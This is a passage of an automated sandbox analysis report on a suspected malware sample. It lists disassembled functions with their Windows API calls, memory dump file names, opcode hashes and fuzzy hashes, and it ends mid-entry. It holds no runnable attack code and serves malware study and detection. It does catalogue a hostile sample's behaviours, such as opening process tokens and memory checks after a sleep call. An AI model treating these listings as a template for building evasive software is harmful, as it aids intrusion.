                                              • Instruction ID: f05eb49000e37c711071195388f2e1cba40fdc7cab4500cfb20df8ad8efa311d
                                              • Opcode Fuzzy Hash: c1ad203d9ab6e74db58fb9bca32bf96ebd60b81746b8bff510ff6c9b6fa5c114
                                              • Instruction Fuzzy Hash: 34F09A36002218FAEB122F95AC0AFCA3E29AF46310F548100FB01710E1C7760595CBE5
                                              Function 00D898B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSysColor.USER32(00000008), ref: 00D898CC
                                              • SetTextColor.GDI32(?,?), ref: 00D898D6
                                              • SetBkMode.GDI32(?,00000001), ref: 00D898E9
                                              • GetStockObject.GDI32(00000005), ref: 00D898F1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Color$ModeObjectStockText
                                              • String ID:
                                              • API String ID: 4037423528-0
                                              • Opcode ID: ac4ef964bd43fd7385fdb2ae9769a7df12d344128b9ca171557c968580cac554
                                              • Instruction ID: 2932c57328d53e4515e7ea746ea758c810646db1aabdd845e861f117f9d40e75
                                              • Opcode Fuzzy Hash: ac4ef964bd43fd7385fdb2ae9769a7df12d344128b9ca171557c968580cac554
                                              • Instruction Fuzzy Hash: 05E06531244240AEDB215B75AC09BE83F21AB11335F188319F6F9640E1C37246959F20
                                              Function 00DD162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 00DD1634
                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,00DD11D9), ref: 00DD163B
                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00DD11D9), ref: 00DD1648
                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,00DD11D9), ref: 00DD164F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CurrentOpenProcessThreadToken
                                              • String ID:
                                              • API String ID: 3974789173-0
                                              • Opcode ID: 0874fcbc611e09a4b9bc67a7abe139642fd07a4c60dbe99e21a01aaf9758d159
                                              • Instruction ID: 34f622024ab3928529e63fe2a7af2bf182452cf0018751b8f2459e85f7029684
                                              • Opcode Fuzzy Hash: 0874fcbc611e09a4b9bc67a7abe139642fd07a4c60dbe99e21a01aaf9758d159
                                              • Instruction Fuzzy Hash: 95E08635601211EFE7201FA29D0DB463B7CEF44791F288909F245E9090E6358489C760
                                              Function 00DCD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00DCD858
                                              • GetDC.USER32(00000000), ref: 00DCD862
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DCD882
                                              • ReleaseDC.USER32(?), ref: 00DCD8A3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CapsDesktopDeviceReleaseWindow
                                              • String ID:
                                              • API String ID: 2889604237-0
                                              • Opcode ID: f3e447c377757ca711cc8dbe39eedadd49024e85f106f88f0e3e018e658ac9d4
                                              • Instruction ID: f8e990003cad0834e98f7a2cc863792671798f403e4fe8d8c288d20fa9cbd638
                                              • Opcode Fuzzy Hash: f3e447c377757ca711cc8dbe39eedadd49024e85f106f88f0e3e018e658ac9d4
                                              • Instruction Fuzzy Hash: 47E01270800205DFCF519FA1D80866DBBB2FF08710F208119F846F7250C7368545EF60
                                              Function 00DCD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00DCD86C
                                              • GetDC.USER32(00000000), ref: 00DCD876
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DCD882
                                              • ReleaseDC.USER32(?), ref: 00DCD8A3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CapsDesktopDeviceReleaseWindow
                                              • String ID:
                                              • API String ID: 2889604237-0
                                              • Opcode ID: d004501727bb75181c4bdeff367a8a95fd2a03c550adaa541a64547dbbe3b15d
                                              • Instruction ID: 6eb6c7c8837f91a952c6b73c9d0ce7e617f0811a6194dde84c3d2dec174a6622
                                              • Opcode Fuzzy Hash: d004501727bb75181c4bdeff367a8a95fd2a03c550adaa541a64547dbbe3b15d
                                              • Instruction Fuzzy Hash: 48E01A70800200DFCF50AFA1E80866DBBB1FB08710F208108E84AF7290CB3A59469F50
                                              Function 00DE4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D77620: _wcslen.LIBCMT ref: 00D77625
                                              • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00DE4ED4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Connection_wcslen
                                              • String ID: *$LPT
                                              • API String ID: 1725874428-3443410124
                                              • Opcode ID: eb3542905fc44720aac655359315b037648b521d4d111c858f1b6ec755e53a4d
                                              • Instruction ID: ea424cca5810fd9adf1b69d67f3436e8e4a9160bc63b6f7d34f8ca197da5e252
                                              • Opcode Fuzzy Hash: eb3542905fc44720aac655359315b037648b521d4d111c858f1b6ec755e53a4d
                                              • Instruction Fuzzy Hash: 7B916D75A002449FCB14EF59C484EAABBF1FF44704F198099E84A9F3A2D731ED85CBA1
                                              Function 00D9E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                              Download Yara Rule
                                              APIs
                                              • __startOneArgErrorHandling.LIBCMT ref: 00D9E30D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ErrorHandling__start
                                              • String ID: pow
                                              • API String ID: 3213639722-2276729525
                                              • Opcode ID: 335c75e23be3a4c2701bab8419074dc76dbd929b7a4446beb8d6906e17c5fc58
                                              • Instruction ID: ac28e551a3eb106a51ca29351399296834f23aefdafbd5b71bf16aeee5ccf028
                                              • Opcode Fuzzy Hash: 335c75e23be3a4c2701bab8419074dc76dbd929b7a4446beb8d6906e17c5fc58
                                              • Instruction Fuzzy Hash: 48516E71A0D202DACF15BB14CD013B97BA4EB41741F388DA8F0D5922E9EB35CCD59A76
                                              Function 00DF7771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                              Download Yara Rule
                                              APIs
                                              • CharUpperBuffW.USER32(00DC569E,00000000,?,00E0CC08,?,00000000,00000000), ref: 00DF78DD
                                                • Part of subcall function 00D76B57: _wcslen.LIBCMT ref: 00D76B6A
                                              • CharUpperBuffW.USER32(00DC569E,00000000,?,00E0CC08,00000000,?,00000000,00000000), ref: 00DF783B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper$_wcslen
                                              • String ID: <s
                                              • API String ID: 3544283678-2940880691
                                              • Opcode ID: bddc67e844f609abe94ce456c318421b7a35c045d521ba0505dfa8d92b353f3a
                                              • Instruction ID: 55d801e029df76a21b429b9df2e854f207302252fb5419c5b918fb1c2a373424
                                              • Opcode Fuzzy Hash: bddc67e844f609abe94ce456c318421b7a35c045d521ba0505dfa8d92b353f3a
                                              • Instruction Fuzzy Hash: 89614B72914119AACF14EBA4CC91DFDB378FF14700B59812AF646B7091FF60AA49DBB0
                                              Function 00D8E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: #
                                              • API String ID: 0-1885708031
                                              • Opcode ID: 0f91d272c6d019cc44b5db1a66fff86b241eba154ad33d8299e3d0e073e1c7f5
                                              • Instruction ID: 6bbd799d9cb89d05985b191b429d77dc39d1def1f6c7d88de4b5c991856c192b
                                              • Opcode Fuzzy Hash: 0f91d272c6d019cc44b5db1a66fff86b241eba154ad33d8299e3d0e073e1c7f5
                                              • Instruction Fuzzy Hash: 595101B5504256EFDF25EF68C481FBA7BA4EF65310F288059E8919B2D0D634DD42CBB0
                                              Function 00D8F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNEL32(00000000), ref: 00D8F2A2
                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00D8F2BB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: GlobalMemorySleepStatus
                                              • String ID: @
                                              • API String ID: 2783356886-2766056989
                                              • Opcode ID: f77ff7300c11e246c7e32666d04127725e008b0de1c0134035d29ff5a21e1118
                                              • Instruction ID: 7b09bfa6ef69c7e070799b22204157fe484c6bc23ea3ea13371ea11a78f6a092
                                              • Opcode Fuzzy Hash: f77ff7300c11e246c7e32666d04127725e008b0de1c0134035d29ff5a21e1118
                                              • Instruction Fuzzy Hash: 2C5142724187849FD320AF21DC86BAFBBF8FF95300F81885CF199511A5EB308529CB66
                                              Function 00DF5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                              Download Yara Rule
                                              APIs
                                              • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00DF57E0
                                              • _wcslen.LIBCMT ref: 00DF57EC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper_wcslen
                                              • String ID: CALLARGARRAY
                                              • API String ID: 157775604-1150593374
                                              • Opcode ID: 6acb471d5cac2d610e77b43d31566e8d720f2ec280e24a4f90abff407c57913e
                                              • Instruction ID: cecf9e4a576909aee4f00ee623ff55219cffe20a5724428389cd88e778f7dd56
                                              • Opcode Fuzzy Hash: 6acb471d5cac2d610e77b43d31566e8d720f2ec280e24a4f90abff407c57913e
                                              • Instruction Fuzzy Hash: 1941B331A001099FCB14DFA8E8818BEBBB5EF59350F158169F605A7295E7309D81CBB0
                                              Function 00DED0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _wcslen.LIBCMT ref: 00DED130
                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00DED13A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CrackInternet_wcslen
                                              • String ID: |
                                              • API String ID: 596671847-2343686810
                                              • Opcode ID: 6865e5c916a6d439fe66ed885a8ee6d1acb418ac57111cc309be0db8bf8c1779
                                              • Instruction ID: 1cec7b494e995d4a44e8bc9ae5651c841e4ebb93417e62ca86f53a1ba26ef656
                                              • Opcode Fuzzy Hash: 6865e5c916a6d439fe66ed885a8ee6d1acb418ac57111cc309be0db8bf8c1779
                                              • Instruction Fuzzy Hash: EE310D71D00219ABCF15EFA5CC85AEE7FBAFF04340F104019F819A6165EB31A956DB71
                                              Function 00E0356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                              Download Yara Rule
                                              APIs
                                              • DestroyWindow.USER32(?,?,?,?), ref: 00E03621
                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E0365C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$DestroyMove
                                              • String ID: static
                                              • API String ID: 2139405536-2160076837
                                              • Opcode ID: 23b64de7827e57308ac27126fc3ae26cabf4b6b2ef73b8bc7aea9d8e4ff4e3c1
                                              • Instruction ID: 89c33ae41b43880510022d14af6003549d7c719dc9fce95d764a06f7b109e76c
                                              • Opcode Fuzzy Hash: 23b64de7827e57308ac27126fc3ae26cabf4b6b2ef73b8bc7aea9d8e4ff4e3c1
                                              • Instruction Fuzzy Hash: B4318D71110604AEDB24DF78DC80EFB73ADFF98724F10A619F9A5A7290DA31AD91C760
                                              Function 00E04537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00E0461F
                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E04634
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: '
                                              • API String ID: 3850602802-1997036262
                                              • Opcode ID: 622b980354947f6399ce98c55b0a52e4e542ef456df49d85816f292a140dffab
                                              • Instruction ID: 77129484db4dc7933a221c1418c275cb4878092f7db43ff1e37a2463bae3dd8f
                                              • Opcode Fuzzy Hash: 622b980354947f6399ce98c55b0a52e4e542ef456df49d85816f292a140dffab
                                              • Instruction Fuzzy Hash: D53139B5A013099FDF14CFA9DA80BDA7BB5FF49304F105069EA04AB381E771A981CF90
                                              Function 00E031EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E0327C
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E03287
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: Combobox
                                              • API String ID: 3850602802-2096851135
                                              • Opcode ID: 0972d07a0f620816c8fdca3d60a3f1678e778b23b333295f20f99e45a1ab8a66
                                              • Instruction ID: 3c8d53e1b4ce8dd2a9260417ee8712c7adf10ba47738c430bc99d8092b348374
                                              • Opcode Fuzzy Hash: 0972d07a0f620816c8fdca3d60a3f1678e778b23b333295f20f99e45a1ab8a66
                                              • Instruction Fuzzy Hash: ED1193712002087FEF259FA4DC85EBB376EEB54368F105525F518A72E1D6319D918760
                                              Function 00E03710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D7600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D7604C
                                                • Part of subcall function 00D7600E: GetStockObject.GDI32(00000011), ref: 00D76060
                                                • Part of subcall function 00D7600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D7606A
                                              • GetWindowRect.USER32(00000000,?), ref: 00E0377A
                                              • GetSysColor.USER32(00000012), ref: 00E03794
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                              • String ID: static
                                              • API String ID: 1983116058-2160076837
                                              • Opcode ID: 41814cbff8ac7d61b9ea651d2702ca154fc1dcf4c06eb4dd69387333148d0174
                                              • Instruction ID: 6ebb45463d25c9209d106b6abb3692ce6693295674ccbf30bec53866e3a52540
                                              • Opcode Fuzzy Hash: 41814cbff8ac7d61b9ea651d2702ca154fc1dcf4c06eb4dd69387333148d0174
